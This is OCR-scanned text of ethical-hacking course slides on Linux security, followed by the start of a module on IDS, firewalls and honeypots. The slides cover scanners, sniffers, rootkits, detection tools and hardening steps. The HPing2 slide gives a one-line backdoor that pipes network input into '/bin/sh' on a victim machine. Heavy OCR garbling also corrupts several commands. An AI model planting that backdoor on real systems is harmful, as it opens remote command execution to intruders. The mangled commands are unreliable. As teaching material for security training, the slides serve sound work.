integrity checker installed and. ..we are reasonably confident that the portage tree stored on that box was unaffected." 



The Gentoo team claimed that the breach was detected within approximately 1 
hour. 



-r advertisement 



"During this time, approximately 20 users synchronized against the portage mirror stored on this box. The method 
used to gain access to the box remotely is still under investigation. We will release more details once we have 
ascertained the cause of the remote exploit," the statement said. 

The machine didnt actually belong to the project. It was donated by a sponsor, whose identity so far undisclosed. 



The Debian project servers were compromised by a previously unknown local 
vulnerability in the Linux kernel which has since been identified and rectified by a 
patch. 

Patrick Gray of ZDNet Australia reported from Sydney. 



Get Up to Speed on... 

Enterprise securitv ► 
Get the latest headlines and 
company-specific news in our 
expanded GUTS section. 
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Module Objectives 



© Why choose Linux? 

© How to compile 
programs in Linux 

© Linux security 

© Linux a favorite among 
hacl<ers 

© Why is Linux hacl<ed? 

© Linux vulnerabilities in 
2003 

© Applying patches to 
programs 



© Scanning in Linux 

© Password cracking in 
Linux 

© IP tables 

© Linux IP chains 

© SARA 

© Linux Rootkits 

© Rootkit countermeasures 

© Linux Intrusion 
Detection systems 

© Tools in Linux 
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Modu eFlow 



Why Linux? 



Linux Security 




Scanning in Linux ^ 



Applying Patches to ^ 

Prnnrptmc; ^ 



Password Cracking . 

' iniiv 



Linux I P Tables ^ Linux I P Chains 



SARA 



LIDS * 
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Root kits 
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Why Linux? 



1^ 



© M ajority of servers around the globe are runni ng on 
Linux/ Unix-like platforms 

© Easy to get and easy on the pocket 

© There are many types of L i nux- D i stri buti ons/ D i stros/ 
Flavors, such as: Red Hat, Mandrake, Yellow Dog, 
Debian, etc. 

© Source code is aval I able 

© Easy to modify 

© Easy to develop a program on Linux 
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Linux- Basics 



© Aliased commands 
can pose a security 
threat if used witiiout 
proper care 

© Linux shell types - /sh, 
/l<sh, / bash, /csh, 
/tcsh 

© Linux user types, 
groups and 
permissions 

© Overview of Linux 
signals, logging and 
/etc/ security 
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Chrooting 



© Linux is an open source Operating System with 
many vendors providi ng different security 
options. 

© Unlikeotlier OSs, Linux is not secure. 

© Linux is optimized for convenience and doesn't 
mal<e security easy or natural . 

© The security on Linux will vary from user to 
user. 

© Linuxsecurity is effectively binary: all or 
nothing in terms of power. Facilities such as 
setuid execution tend to give way in the middle. 
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Why is Linux H acl<ed? 



© Linux is widely used on a large number of servers in the 
world making it a 'de facto' backbone. 

© Si nee application source code is available, it is very easy 
to f i nd out the vul nerabi I i ti es of the system. 

© Many applications on Linux are installed by default so 
they are more vul nerabi e to attacks. Si nee the 
applications are open source, they may have bugs 
associated with them. 

© There are too many default i nstal led daemons. 

• The admi n must remove unused daemons 

• Change / etc/ red f i I es and / etc/ i netd .conf f i I e 

© There are too many default installed setuid programs. 
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Linux Vulnerabilities in 2003 



© Vulnerabilities were announced in many 
packages, including 

• apache, balsa, bind, bugzilla, cdrecord, cfengine 

• cron, cups, cvs, ethereal (many), evolution, exim, 
fetchmail (many), fileutils 

• gdm, ghostscript, glibc, gnupg, gzip, hylafax, inetd, 
iproute, KDE, kerberos. Kernel 

• Iprng, Ish, lynx, mailman, man, mozilla, mpgl23, 
mplayer, mutt, MySQL, openssh, openssi 

• perl, pine, PHP, postfix, PostgreSQL, proftpd, 
python, rsync, samba, screen, sendmail, snort, 
stunnel, sudo, tcpdump, vim, webmin, wget, wu- 
ftpd, xchat, XFree86, xinetd, xpdf, and zlib 
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H ow to Apply Patches to Vul nerable 
Programs 



© Check the Linux distribution homepage e.g., 
Redhat, Debian, Alzza, and so on 

© Go to the respective Websites of the vendors 
from whom the user has bought the program 
and download the patches 
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Scanning Networks 



© Once the I P address of a target system is known, an 
attacker can begin the process of port scanning, looking 
for holes in the system through which the attacker can 
gai n access 

© A typical system has 2^16 - 1 port numbers with one 
TCP port and one U DP port for each number 

© Each one of these ports are a potenti al way i nto the 
system 

© Themost popular scanning tool for Linux is N map 
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Scanning Tool: Nessus 



© One essenti al type of tool for any 
attacker, or defender, is the 
vul nerabi I ity scanner. 

© These tool sal low the attacker to 
connect to a target system and check 
for such vul nerabi I i ti es as 
configuration errors, default 
configuration settings that allow 
attackers access, and the most 
recently reported system 
vulnerabilities. 

© The preferred open-source tool for 
this IS Nessus. 

© Nessus is an extremely powerful 
network scanner. 1 1 can also be 
configured to run a variety of 
attacks. 



Nessus portscanning/attack status 



grincheuK.l 



prof.fr.rie53U3.org 



gate\i'a/.fr 



Fortscan : 
Attack ; 
Secuhtv check : 



[ Stop 



infosrch.cgi 



Fort3C3in : 
Attack : 
Security" check : 



Stop 



Netscape Server ?PageService3 bug 



Portscan : 
Attack : 
Security check : 



Stop 



mstream agent Detect 



Portscan : 
Attack : 
Security check : 



Quote of the da^ 



bonsai. fr.nes3U3.org 



Portscan : 
Attack : 
Security check : 



SMB use domain SID to enumerate users 



Stop the whole test 
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Tool : Cheops 



I 





Qieops Network User Interface 




File 


Page 


Help 



Friends 




dni 01 ax.cse 

dni 01 as.cse 



J 



gink.cse 
dni 01 at.cse 
subnet27-1 dnIOIan.cse 



131.204.206.1 



207. 230. 72. Z6 



207.230.72.6 



-L 



|Saved 7root/.cheops-map' 
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Port Scan Detection Tools 



© KLAXON 

© Scanlogd - detects and logs TCP port scans 

http:// www. open wal I .com/ scanlogd/ 

Scanlogd only logs port scans. 1 1 does not prevent them. 
The user will only receive summarized information in 
the system's log. 

© Psionic PortSentry 

http://www.psionic.com/ products/ portsentry/ 

Portscan detection daemon, Portsentry, has the ability 
to detect port scans (including stealth scans) on the 
network i nterfaces of the user's server. U pon alarm, it 
can block the attacker via hosts.deny, dropped route, or 
firewall rule. 
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Password Cracking in Linux 



© X crack 

(http:// packetstorm.l i nuxsecurity.com/ Crackers/ ) 

© 1 1 f i nds any passwords that match words i n the 
dictionary file the user provides, but it won't apply any 
combinations or modifications of those words 

© 1 1 i s a comparati vel y fast tool 
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PChains 



© A rewrite of the L i nux I Pv4 f i rewal I i ng code, 
and ipfwadm, which was a rewrite of BSDs ipfw. 
1 1 is requi red to admi nister the I P pacl<et f i Iters 
in Linux l<ernel versions 2.11D2 and above. 

© The older Linux fi rewal ling code doesn't deal 
with fragments, has 32- bit counters, doesn't 
allow specification of protocols other than TCP, 
U DP or I CM P, cannot make large changes 
atomically, cannot specify inverse rules, has 
some quirks, and can be tough to manage. 
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IPTables 



© I PTables is the replacement of userspace tool ipchains 
in the Linux 2.4 kernel and beyond. I PTables has many 
more features than IPChains. 

© Connection tracking capability, i.e., the ability to do 
stateful packet inspection. 

© Simplified behavior of packets negotiating the built-in 
chains (I NPUT, OUTPUT and FORWARD). 

© A clean separation of packet filtering and network 
address translation (NAT). 

© Rate-limited connection and logging capability. 

© The ability to filter on tcp flag and tcp options, and also 
MAC addresses. 
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Differences Between ipchains and 
ipfwadm 



© M any arguments have been remapped: capitals now 
indicates a command, and lower case indicates an 
opti on 

© Arbitrary chains are supported, so even built-in chains 
have full names instead of flags (e.g., Input' instead of 

I') 

© The '-k' option has vanished: use'! -y' 

© The b' opti on actual ly i nserts/ appends/ del etes two 
rules, rather than a single 'bidirectional' rule 

© The '-b' option can be passed to '-C' to do two checks 
(one in each direction) 

© The '-X' option to '-1' has been replaced by '-v' 
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How to Organize and Alter Firewall 
Rules 



© M inimizethe number of rule- checks for the 
most common packets 

© If thereisan intermittent link, saya PPP link, 
the user might want to set the first rule in the 
i nput chai n to be set to '-i pppO -j DE NY' at 
boot time, than have something fikethis in his 
ip-up script: 

# Re-create the 'ppp-in' chain, i pchai ns- restore -f < 
ppp-in.firewall # Replace DENY rulewith jumpto 
ppp-handling chain. ipchains-R input 1-i pppO -j 
ppp-in 

User's ip- down script would look lil<e: 
ipchains-R input 1-i pppO -j DENY 
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SARA (Security Auditor's Research 
Assi stant) 



http://www-arc.com/ sara 

© TheSecurityAuditor'sResearch Assistant (SARA) is a 
third generation Unix-based security analysis tool that 
supports the FBI Top 20 Consensus on Security 

© SARA operates on most Unix- type platforms including 
Linux and MacOSX 

© SARA is the upgrade of SATAN tool 

© Getting SARA up and running is a straightforward 
compilation process, and the rest is done via a browser 
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Tool: Sniff it 



http :/ / repti I e. rug. ac. be/ ^coder/ sn i ff i t/ sn i ff i t. html 

© Sniffit is one of the most famous, and fastest, Ethernet 
sniffers for Linux 

© User can run it either on the command line, with 
optional plug- ins and filters, or in interactive mode, 
which is the preferred mode 

© The interactive mode of Sniffit allows the user to 
monitor connections in real-time and, therefore, sniff 
real-ti me too 

Note: Remember to download the patch and then 
recompile Sniffit, for optimum results 
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Hacking Tool: HPing2 



http://www.hpi ng.org 

© H pi ng2 i s a command- 1 i ne ori ented TCP/ 1 P pacl<et 
assembly/ analyzer 

© M ore commonly known for its use as a pi ngi ng uti I i ty, 
H Pinq2 carries a hidden but handy usage, that is, a 
backdoor troj an 

© J ust enter the f ol I owi ng command on the vi cti m 

$ . /hping2 -I eth) -9ecc | /bin/sh 

Then Tel net i nto any port of the vi cti m and i nvoke 
commands remotely on the victim's host by preceding 
any Unix/ Linux commands with ecc 

$ tel net vi cti m.com 80 

$ eccecho This text i mitates a troj an shovel 
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I 



http:// 1 i n.fsid.cvut.c^ ^kra/ i ndex.html 

© One of H unt's advantages over other session hijacking tools is that 
it uses techniques to avoid ACK storms. 

© Hunt avoids the ACK storm, and the dropping of the connection, 
by usi ng ARP spoof i ng to estabi ish the attacker's machi ne as a 
relay between Source and Destination. 

© Now the Attacker uses H unt to sniff the packets the Source and 
Destination send over this connection. The Attacker can choose to 
act as a rel ay and forward these packets to thei r i ntended 
destinations, or he can hijack the session. 

© The attacker can type i n commands that are forwarded to a 
Destination but that the Source can't see. Any commands the 
Source types in can be seen on the Attacker's screen, but they are 
not sent to Desti nati on. Then H unt al lows the attacker to restore 
the connection back to the Source when h^she is done with it. 
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Tool: TCP Wrappers 



© Allows the user to monitor/ filter incoming 
requests for SYSTAT, FINGER, FTP, TELNET, 
R-Lommands, TFTP, TALK, and other network 
services 

© Provides access control to restrict what systems 
connect with which networl< daemons 

© Provides some protection from host spoofing 

© H as 4 components, namely: 

• Tcpd- the actual wrapper program 

• Tcpdmatch, tcpdchk- ACL testing programs 

• Try-from- tests host lookup function 

• Safe-fi nger- a better versi on of f i nger 
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Linux Loadable Kernel Modules 



© LKMs are Loadable Kernel Modules used by the Linux 
kernel to expand his functionality 

© The advantage of those LKMs: They can be loaded 
dynamically; there must be no recompilation of the 
wnol e kernel . Because of these features, they are often 
used for specific device drivers (or fi esystems) such as 
soundcards, etc. 

© This command forces the system to do the fol lowi ng 
things: 

• Load the objectfile (here nnodule.o) 

• Gal I create_ nnodule systenncal I (for systenncal Is -> see 1 .2) for 
rel ocati on of nnennory 

• Unresolved references are resolved by Kernel -Symbols with the 
systemcal I get_ kernel_ syms 

• After this^ the init_ nnodule systemcal I is used for the LKM 
initialisation ->executing int init_module(void), etc. 
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H acki ng Tool : Li nux Rootki ts 



© One way an i ntruder can mai ntai n access to a 
compromised system is by installing a rootkit 

© A rootkit contai ns a set of tools and replacement 
executabi es for many of the operati ng system's cri ti cal 
components, used to hide evidence of the attacker's 
presence and to give the attacker backdoor access to the 
system 

© Rootki ts requi re root access to i nstal I , but once set up, 
the attacker can get root access back at any ti me 
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© 



Knark: 



• Thefollowing isthelist of files that come along with Knark: 

Makefile, apache. c, Apache. cgi, backup, Bj.c, caine, Clearmail, 
dmesg, Dmsg, ered. Exec, fix, Fixtext, ftpt, Gib, gib.c, HdsO, 
hidef. Inch, init, Lesa, login Lpdx, Ipdx.c, Make-ssh-host-key, 
make-ssh- known- hosts. Module, nethide. Pgr, removeme, 
Rexec, rkhelp, si 2 SI2.c, snap, Ssh_config, sshd_config, Ssht, 
statdx2 , Sysmod.o, sz, T666, unhidef, Wugod, zap 

• KNARK comes with a few good exploits as well, such as Lpdx, 
T666, Wugod 



• First rootkit of its kind that is precompiled and yet allows the 
user to define a password; the password is stored in a external 
encrypted file 



© 



Torn: 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Rootkits: Tuxit, Adore, Ramen 



© Tuxit 

• Written by a Dutch group called Tuxtendo. 

• There are six files in the tuxkit, which includea README, an 
installation script, and four tarred/ zipped files. 

© Adore 

• Adore is a worm that was originally known as the Red Worm. 

• LPRng is installed by default on Red Hat 7.0 systems. From the 
reports so far. Adore started to spread from Apri I X 2001 

© Ramen 

• 1 1 is a Li nux-based I nternet worm known as named after the 
popular noodle soup. 

• 1 1 has been seen i n the wi I d affecti ng systems that run Red H at 
Inc.'s 6.2 or 7.0 versions of the open-source OS. 
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Rootkit: Beastkit 



© Beastkit 7.0 replaces common binaries that can be used to monitor 
system operati ons ( I i ke ps) and the I i st of programs i ncl uded i n the 
rootkit (bin.tgz) 

© Thetimestamp does not change, becausethe rootkit uses touch - 
acmr to transmit thetimestamp to the rootkit files 

© Beastkit contains some tools (bktools) (placed at 
/lib/ldd.so/bktools): 

• bkget - SynScan Daemon ( by psychoi d/ tCI ) 

• bkp - hdlp2 version 2.05 

• bks- Sniffer 

• bksb - "sauber"-Script (seeduarawkz-rootkit), cleans up some of the 
intruder's traces 

• bkscan - SynScan ( by psychoi d/ tCI ) 

• bktd 

• patch - SSHd-Patchscript (update to ssh-I2.32 usingftp) 

• pri - SSHd-Patchscript (update to ssh-I2.32 using http) 

• prw - SSHd-Patchscript (updateto ssh-I2.32) 
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Rootkit Counter measures 



© chkrootkit is a tool to 
I ocal ly check for si gns 
of a rootkit 

© 1 1 contai ns chkrootkit, 
a she! I scri pt that 
checks system 
binaries for rootkit 
modification 




chkrootkit 



http://www.chkrootkit.org/ 
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chkrootkit Detects the Following, 
Rootkits 



1. 


Irk3, lrk4, lrk5. 


19. 


|dsc -rootkit; 




lrk6 (and some 


20. 


Ducoci rootkit; 




vuiibiiiLi)), 


21. 


x.u Woim, 


2. 


Solaris rootkit; 


22. 


RST.b trojan; 


3. 


FreeBSD rootkit; 


23. 


duarawkz; 


4. 


tOrn (including 


24. 


knark LKM; 




some variants 


25. 


Monkit; 




and tOrn vS) ; 


26. 


Hidrootkit; 


5. 


Ambient's 




Bobkit; 




Rootkit for 


27. 


Pizdakit; 




Lmux (AEK); 


28. 


tOrn (vS.O 


6. 


Ramen Worm; 




variant); 


7. 


rh[67]-shaper; 


29. 


Showtee; 


S. 


RSHA; 


30. 


Optickit; 


9. 


Romanian 


31. 


T.R.E; 




rootkit; 


32. 


MithRa's 


10. 


RE17;Lion 




Rootkit; 




Worm; 


33. 


George; 


11. 


Adore Worm; 


34. 


SucKIT; 


12. 


LPD Worm; 


35. 


Scalper 


13. 


kenny-rk; 




(FreeBSD/Apach 


14. 


Adore LKM; 




e chunked 


15. 


ShitC Worm; 




encoding worm); 


16. 


Omega Worm; 


36. 


Slapper A, B, C 


17. 


Wormkit Worm; 




andD 


IS. 


Maniac -RK; 







37. (Linux/Apache 

mod_ssl Worm); 
3S. OpeuBSD ik vl, 

39. lUogic rootkit; 

40. SK rootkit. 

41. sebekLKM; 

42. Romanian 
rootkit; 

43. LOG rootkit; 




chkrootkit 
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Linux Tools: Application Security 



© Whisker (http://www.wiretrip.net) 

Rai n. Forest. Puppy's excellent CGI vul nerabi I ity scanner. 

© Flawfinder (http://www.dwheeler.conn/flawfinder/) 

Flawfinder is a Python program that searches through source code for potential 
security flaws, listing potential security flaws sorted by risk, with the most 
potentially dangerous flaws shown first. The risk level depends not only on the 
function, but on thevaluesof the parameters of the function. 

© StackGuard (hhtp:// www.immunix.org) 

StackGuard is a compiler that emits programs hardened against "stack smashing" 
attacks. Stack smashing attacks area common form of penetration attack. Programs 
that have been compiled with StackGuard are largely immune to stack smashing 
attack. Protection requires no source code changes at all. 

© Li bsafe ( http:/ / www.avayal abs.com/ proj ect/ 1 i bsafe/ i ndex. html ) 

1 1 i s general I y accepted that the best sol uti on to buffer overf I ow and format stri ng 
attacks is to fix the defective programs. 
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Linux I ntrusion Detection System 
(LIDS) 



© LI DS is an enhancement for the Linux kernel, 
written byXieHuagang and Philippe Biondi 

© It implements several security features, such as 
mandatory access controls (MAC), a port scan 
detector, file protection (even from root), and 
process protecti on 

© LI DS can be downloaded at 
http:/ / www. I i ds.org/ 
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Advanced I ntrusion Detection 
Environment (Al DE) 



© Al DE (Advanced I ntrusion Detection 
E n vi ron ment) i s a free rep! acement f or Tri pwi re 

© 1 1 creates a database from tine regular 
expression rules tliat it finds from tine config file 

© Oncethis database is initialized, it can be used 
to verify the i ntegrity of the f i les 

© This fi rst Al DE database is a snapshot of the 
system in its normal state and the yardstick by 
which all subsequent updates and changes will 
be measured 
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Linux Tools: Security Testing Tools 



© NMap (http://www.insecure.org/nmap) 

Premier network auditi ng and testi ng tool 
© LSOF (ftp://vic.cc.pudue.edu/pub/tools/unix/lsof) 

LSOF lists open files for running Unix/ Linux processes 

© N etcat ( http:/ / www.atstake.com/ research/ tool s/ i ndex. html ) 

Netcat is a simple Unix utility that reads and writes data across network 
connections, using TCP or UDP protocol 

© Hping2 (http://www.kyuzz.org/antirez/hping/) 

H pi ng2 is a network tool able to send custom I CM P/ U DP/ TCP packets 
and to display target replies like ping does with I CMP replies 

© N emesi s ( http:/ / www. packetn i nj a. net/ nemesi s/ ) 

The Nemesis Project is designed to be a command- line based, portable 
human IP stack for Unix/ Linux 
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Linux Tools: Encryption 



© Stunnel (http://www.stunnel.org) 

Stunnel isa progrann that allows the user to encrypt arbitrary TCP 
connections inside SSL (Secure Sockets Layer) aval I able on both 
Unix and Windows. Stunnel can allow the user to secure non-SSL 
aware daennons and protocols (like POP, I MAP, NNTP, LDAP, etc.) 
by having Stunnel provide the encryption, requiring no changes to 
daennon's code. 

© OpenSSH /SSH (http://www.openssh.com/) 

SSH (Secure Shell) is a progrann for logging into a rennotennachine 
and for executing connnnands on a rennote nnachine. 1 1 provides 
secure encrypted connnnuni cations between two untrusted hosts 
over an insecure network. 

© GnuPG (http://www.gnupg.org) 

GnuPG isaconnpleteandfree replacennentfor PGP. Since it does 
not use the patented I DEA algorithm, it can be used without any 
restrictions. 
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Linux Tools: Log and Traffic Monitors 



i 



© MRTG (http://www.nnrtg.org) 

The Multi-Router Traffic Grapher (MRTG) is a tool to nnonitorthe 
traffic load on network- 1 inks. 

© Swatch (http://www.stanford.edu/ ^atkins/swatch/) 

Swatch, the si nnple watch daennon, is a progrann for Unix systenn 
logging. 

© Ti nnbersee ( http:// www.fastcoder . net / thumper/ softwaro^ 
sysadnnin/ tinnberse^) 

Tinnberseeisa progrann verysinnilar to the Swatch progrann. 

© Logsurf (http://www.cert.dfn.de/eng/logsurf/) 

The progrann log surfer was designed to nnonitor any text-based 
logfi es on the systenn in real tinne. 

© TCP Wrappers (ftp://ftp.prcupine.org/pub/security/index.htnnl) 

WietseVenenna's network logger, also known asTCPD or 
LOG_TCP. These progranns log the cl lent hostnanne of i nconni ng 
telnet, ftp, rsh, riogin, finger, etc. requests. 
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Linux Tools: Log and Traffic Monitors 



© I PLog (http://ojnk.sourceforge.net/) 

iplog is a TCP/ 1 P traffic logger. Currently, it is capable of logging 
TCP, UDP, and I CMP traffic. 

© I PTraf (http://cebu.mozcom.conn/ ri ker/ i ptraf/ ) 

I PTraf is an ncurses based I P LAN monitor that generates various 
network statistics including TCP info, UDP counts, I CMP, OSPF 
information, Ethernet load info, node stats, I P checksum errors, 
and others. 

© Ntop (http://www.ntop.org) 

ntop is a Unix/ Linux tool that shows network usage, similar to 
what the popular "top" Unix/Linux command does. 
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Linux Security Auditing Tool (LSAT) 



© It is a post install security audi tor for Linux and 
Unix 

© 1 1 checks for system configurations and local 
network setti ngs on the system for common 
security/config errors and for packages that are 
not needed 

© LSAT consists of the foil owing modules: 

• checkcfg, checkdotfiles, checkfiles, checkftpusers, 
checkhostsfiles, check! netd, check! nittab, checkissue, 
checkkbd, checklimits, checklogging, checkmodules, 
checkmdS, checknet, checknetforward, and checkset. 
to name a few 
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Linux Security Counter measures 



Phvaical Securltv !: 

lock your compu'ter physical in a secure place. 
Passwor-d Security : 

Do not assign easy-to-guess password. 

Do not share your account with other person. 

Check user account with null passTfrd (without passwd) in /etc/shadow. 
HetTforlc Securit y: 

Close the door first hy denying access from network, by default. 
$ oat "ALL: ALL" » /etc/hosts. deny 

Stop all unused services such as sendmail^ NFS. 

$ chkconfigr — list 

$ chkconfig — del sendmail 

$ chkconfig — del nf slock 

$ chkconfig — del rpo 

Check system logs in /var/log regularly especia-lly /var/ log/ secure. 

U pdate yoTir Linua: system regularly . 
Checking the errata (bug fixes) in 
httpi //www. redhat. com/ suppor t/errata 

The update packages can be found in ftp://updates.redhat.com 
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Summary 



© Linux is gaining in popularity and is fast becoming a stable 
industry strength OS 

© Once the I P address of a target systenn is known, an attacker can 
begin port scanning, looking for holes in the systenn for gaining 
access, Nmap being a popular tool 

© Password cracking tools are aval I able for Linux as well 

© Sniffers, as well as Packet assembly/ analyzing tools for Linux, 
provi de attackers with the edge that they have when deal i ng wi th 
other OSs 

© Attackers with root privi leges can engage i n session hijacki ng as 
well 

© Trojans, backdoors, worms are also prevalent in the Linux 
envi ronment 

© As with any other system, a wel I developed i ntegrated procedure is 
to be put in place to counter the threats that exist 
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Ethical Hacking 



ModuleXIX 

E vadi ng I DS, F i rewal I s, 
and detecting Honey Pots 



Scenario 



I 



News spread i n the cracker community! ! ! ! 

" A vulnerability in the web server of a famous 
security site" 

Qui z wanted to have backdoor access to the security site 
to be kept apprised of the latest patches that the site 
was provi di ng to the onl i ne community. 

Using various hacking tools, Quiz hacked the web 
server. Qu I z was del i ghted ! ! ! 

H owever, J ames, the I nformation Security Advisor of 
the security site, fooled Quiz through a honeypot. 
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Module Objectives 



I 



© I ntroduction to I ntrusion Detection Systems 
© Ways to detect an i ntrusion 
© Types of I DS 

© Wliat are Systenn I ntegrity Verifiers? 

© Detection of attacl< by an I DS 

© Different Ways to evade IDS 

© Tools to evade IDS 

© Firewall and its identification 

© Bypassing the firewall 

© Tool s to bypass a f i rewal I 

© H oneypot and its types 

© Detection of honeypots 
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Modu eF ow 



What is IDS? 



I ntrusion 



Types of I DS 




DS Tools 




irewall 



Tools to Evade ^ 
IDS 



Ways to Evade ^ 
IDS 




S Evasion 



Firewall 



^ Firewall Vendors ► Firewall Evasion 



H oneypot 



P 



Counter measures 



H oneypots 



Types of H oneypots ^ 
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© Attacker?/ hackers are always on the 
prowl to compromise networks 

© Custom! zi ng the setti ngs wil I hel p i n 
prevent! ng easy access for hackers 

© I DS, Firewalls, and Honeypots are 
Important technologies which deter an 
attacker from compromisi ng the network 
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Terminology 



© I ntrusion Detection System (I DS) 

• An I DS inspects all inbound and outbound network 
activity and identifies suspicious patterns that 

i ndicates an attack to compromise a system 

© Firewall 

• A fi rewal I is si mply a program or hardware device 
that protects the resources of a private network from 
users of other networks 

© Honeypot 

• A honeypot is a device i ntended to be compromised. 
The goal of setti ng up a honeypot is to have the 
system probed, attacked, and potentially exploited 
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I ntrusion Detection Systems (I DS) 



I 



© An intrusion detection system (I DS) gathers and 
analyzes information from various areas within a 
computer or a networl< to identify possible violations of 
security policy, including unauthorized access as well 
as misuse 

© I DS are also referred to as "packet- sniffers," which 
i ntercept packets travel i ng al ong vari ous 
communication mediums and protocols; usually 
TCP/ 1 P 

© The packets are analyzed i n a number of different ways 
after they are captured 

© An I DS evaluates a suspected intrusion once it has 
taken pi ace and signals an alarm 
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Ways to Detect an I ntrusion 



© There are three ways to detect an 
intrusion: 

• Signature recognition 

- Also known as misuse detection, signature 
recognition tries to identify events that misuse a 
system 

• Anomaly detection 

- Anomaly detection is different from signature 
recogn i ti on i n the su bj ect of the model 

• Protocol Anomaly detection 

- in this type of detection, models are built on 
TCP/ 1 P protocols using their specifications 
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Types of I ntrusion Detection Systems 



© There are two basic types of I DS: 

• Network- based IDS 

- I n a network- based systenn, or Nl DS, the individual packets 
flowing through a network are analyzed 

- An N I DS i s responsi bl e for detecti ng anonnal ous, 

i nappropr i ate, or other data that nnay be consi dered 
unauthorized occurring on a network 

• Host- based IDS 

- I n a host- based systenn, or H I DS, the I DS exanni nes the 
activity on each individual connputer or host 

- HI DS can be installed on nnany different types of nnachines; 
nannely servers, workstations, and notebook connputers 
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© System Integrity 
Verifiers! SI V) monitor 
system f i I es to detect 
changes by an intruder 

© Tri pwi re i s one of the 
popular SIVs 

© SI Vs may watch other 
components such as the 
Wi ndows regi stry as wel I 
as chron configuration to 
find known signatures 
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1. Install & Customise 
Tripwire 









a. Initialize Tripwire 
Database 





3. Run Integrity 
Chock 



NO 



^^Chang^^Xj^ 
h ound 

lYes 



4. Examine Tripwire 
Report 



^-s^rniitte^-^ 



5. Take Appropriate Security 
Measure 



|Ycs 

^-^olicy File^ 
-'^^L^ Working 



7. Update Policy File 
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Tru^ False, Positive Negative 



True 



False 



Positive 



Negative 



An alarm was 
generated and a 
present condition 
should be 
alarmed 


An alarm was 
generated and 
there is no 
condition present 
to warrant one 


Ml 1 dl di 1 1 1 Wdb 

NOT generated 
and there is no 
condition present 
to warrant one 


Ml 1 didi 1 1 1 Wdb 

NOT generated 
and a present 
condition should 
be alarmed 



Source: The Practical I ntrusion Detection Handbook by Paul E. Proctor 

Copyri ght © by BC-Cbunc i I 

Bo-COUnci I All Rights reserved. Reproduction isstrictly prohibited 



I ntrusion Detection Tools 



© Snort 2.10 

© Symantec M anH unt 

© LogI DS 10 

© SnoopNetCop Standard 

© Prelude Hybrid IDS version 0.8.x 

© Samhain 
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Snort 2.10 



I 



© Snort is an open source 
network intrusion detection 
system, capable of 
performi ng real -ti me traff i c 
analysis and packet logging 
on I P networks 

© 1 1 can perform protocol 
analysis and content 
searching/ matching, and 
can be used to detect a 
variety of attacks and 
probes, such as buffer 
overflows, stealth port 
scans, CGI attacks, SMB 
Drobes, and OS 
'i ngerpri nti ng attempts 
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Fie Eift Moiitor Help 



Alert status- 



RocentAlerts- 



La&t5min: 
Last 15 mill : 
Last30min: 
Last 60 min: 
Total: 



8 

17 
32 
127 
103420 



Top Attacks (Last24hrG) 

5^6 I Count 



Last Update 2002-07-11) 13:25:14 



JL 



MISC LargQ ICtiilP Packot 
ICMPPING speedera 
WEB-IIS cmd.eve atress 
ICMP Destination Un reach... 
SCAN nmap TCP 
WEB-CGI calendararcess 
spp_portscan:ports(:anst.. 
spp_pcirtscan:ports(:anst.. 
WEB-MISCIittpclirectotytr.. 
iCiVlP redirect liost 
iCivlP Source Quench 
SCANProjy attempi 
,WEB-FR0NTPAOE/ vti bi.. 



5D4 
468 

m 

161 
150 
144 

74 
68 
63 
62 
58 
OG 
50 



pTopAttackBi 

Attacker 



Graphs P^cent Attempts [ SAM log 

r 



Attacks Last 60 Minutes 




13:13 MiSO 12:21 i^lO 12:3d t^Ml 12:4S 12:30 12S3 1S:« 

TilTl* 



Attacks Last 24 hours 
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I DS : Symantec Manhunt 



© Symantec Manhunt provides high speed 
networl< intrusion detection and real time 
analysis and protects networks from internal an 
external intrusion and denial of service attacks 

© The new version has support for Red H at Linux 
operati ng system 

© It is scalable and flexible to deploy; thus 
reduci ng the total cost of ownershi p 

© 1 1 uses the protocol anomaly detection method 
to sense any i ntrusion 
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Logids 10 



■ 



© LoglDS is a log- 
analysis- based intrusion 
detection system which 
shows real-ti me analysis 
of centralized logs 

© The graphi cal i nterface 
represents the network 
map, where each node has 
a console window through 
which the logs belonging 
to the respective nodes 
can be displayed 
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Internet / External Net 
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DMZIa object deliniion loaded _J 
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-I 



INTRa object delinilionloadBd 
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□ 



WMCantijecldelMiiii loaded 

Admin Console 



-3 

M 




-I 



DNS1a object delnlion loaded 


J 


WE BAa object definilion loaded 


J 

i 




IDS 1 a object delriiliDn loaded 


J 


PDC1 a object delinjIiDnlDadBd 




BDC1a object delinilion loaded 


1 
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J 

-1 
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t/U WW otject definilion loaded 



V.*Web 



] 



Mail ss 
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SnoopNetCop Standard 




©SnoopNetCop is a 
program that can detect 
possi ble packet sniffi ng 
attacks on the network 

© 1 1 i s a program to 
detect LAN cards 
operating in a 
Dromiscuous mode on 
:he network 



SnoopNetCop Standard Version 



File Scan Detect Option Help Exit 



'indows 



Host Name 



IP 



lUnl<.noiwn 

J CHIEF 

J VI R JANG 

JP0RSCHE911 

jUnkno™ 

JHJKIM 

JHAKSHIN 

JDS3JEL 

jUnknom 

JKGKIM 

1FX0773CG 



211.248 
211.248 
211.248 
211.248 
211.248 
211.248 
211.248 
211.248 
211.248 
211.248 
211.248 




Detection Results 



I Warning! 
} Warning! 



I Warning! 
} Warning! 



II 



Detection starts at £003-03-07 £3 9:49:56 Using MAC Address : FF:FF:OCh _^ 
00:00:00 

possibly running Sniffer or IDS, 
is possibly running Sniffer or IDS 
is possibly running Sniffer or IDS, 
is possibly running Sniffer or IDS, 



Warning 
Warning 
Warning 
Warning 



CHIEF [211,241 
VIRJANG [211. 2' 
DS3JEL [211.241 
HJKIM [211,248[ 




Detect Sniffers automaticaiiy. 
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PreludeHybrid IDSVersion 0.8.X 



■ 



© PreludeHybrid IDSVersion 0.8.X acts as both 
a Network- based I DS and a Host- based I DS 

© This version contains the foil owing new, 
generic features: 

• I ncludes hybrid components (H I DS as well 
as N I DS) 

• Split and reorganized components 

• Supports all BSD supported systems 

• Supports Big Endean architectures 

• Supports architectures requi ri ng memory 
aligned access 
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Samhain 



© Samhain is an open source file integrity and 
host- based intrusion detection system for Unix 
and Linux 

© 1 1 uses cryptograph i c checl<sums of f i I es to 
detect mod i f i cati ons 

© 1 1 can detect kernel rootkits for Linux and 
FreeBSD 
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steps to Perform After an I DS Detects 
an Attack? 



© Configure a fi rewal I to fi Iter out the I P address of the 
intruder 

© Alert the user/ administrator (sound/ e-mail/ page) 

© Write an entry i n the event log. Send an SN M P Trap 
datagram to a management console like Ti vol i 

© Save the attack i nformati on (ti mestamp, i ntruder I P 
address, victim I P address/ port, protocol information) 

